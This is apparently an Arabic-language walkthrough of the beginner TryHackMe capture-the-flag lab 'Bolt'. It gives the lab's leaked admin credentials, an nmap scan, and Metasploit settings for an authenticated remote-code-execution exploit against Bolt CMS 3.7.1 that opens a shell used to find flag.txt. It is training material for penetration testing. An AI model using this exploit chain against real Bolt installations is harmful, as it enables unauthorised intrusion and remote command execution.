Bolt | STY IT Labs
STY IT Labs · TryHackMe · Easy

Bolt

استغلال ثغرة في Bolt CMS 3.7.1 — المدير نسي كلمة المرور مكتوبة في مقالة على موقعه الخاص! تسجيل دخول، ثم Authenticated RCE بـ Metasploit للوصول لـ flag.txt.

Easy 20 – 45 دقيقة 2 مهمة Linux

عن اللاب

الـ Credentials المخبية في الموقع
Username
bolt
Password
boltadmin123
Login URL
:8000/bolt
CMS Version
3.7.1

Bolt لاب مبتدئ مبني على Bolt CMS. المدير ترك credentials في مقالات الموقع علناً، ثم نستغل ثغرة Authenticated RCE بـ Metasploit للوصول لـ root shell وإيجاد flag.txt.

الـ CMS بيشتغل على port 8000 مش 80 — كن منتبه عند فحص Nmap.

مسار الحل

1
Nmap — اكتشاف port 8000
فحص البورتات — port 80 (Apache افتراضي) وport 8000 (Bolt CMS) وport 22 (SSH)
nmap -sV -p- IP
2
اقرأ المقالات — اكتشف الـ Credentials
تصفح IP:8000 — مقالة فيها اسم المستخدم والتانية فيها كلمة المرور مكتوبين علناً
3
Login — Admin Panel على /bolt
روح لـ IP:8000/bolt وسجّل دخول — شوف الإصدار في الـ footer (3.7.1)
4
Metasploit — bolt_authenticated_rce
اضبط USERNAME وPASSWORD وRHOSTS وLHOST، ثم شغّل
EDB-ID: 48296
5
Find flag.txt
بعد الحصول على الـ shell، ابحث عن الـ flag في نظام الملفات
find / -name flag.txt 2>/dev/null

مرجع الأوامر

الأمرالوصف
nmap -sV -p- <IP>اكتشاف port 8000
http://<IP>:8000موقع Bolt CMS — اقرأ كل المقالات
http://<IP>:8000/boltصفحة تسجيل دخول الأدمن
use exploit/unix/webapp/bolt_authenticated_rceاختيار الـ exploit
set USERNAME bolt / set PASSWORD boltadmin123الـ credentials المكتشفة
set RHOSTS <IP> / set LHOST <YOUR-IP> / runتشغيل الـ exploit

المهارات اللي هتكتسبها

CMS Enumeration OSINT (محتوى الموقع) Authenticated RCE Metasploit Exploit Web App Testing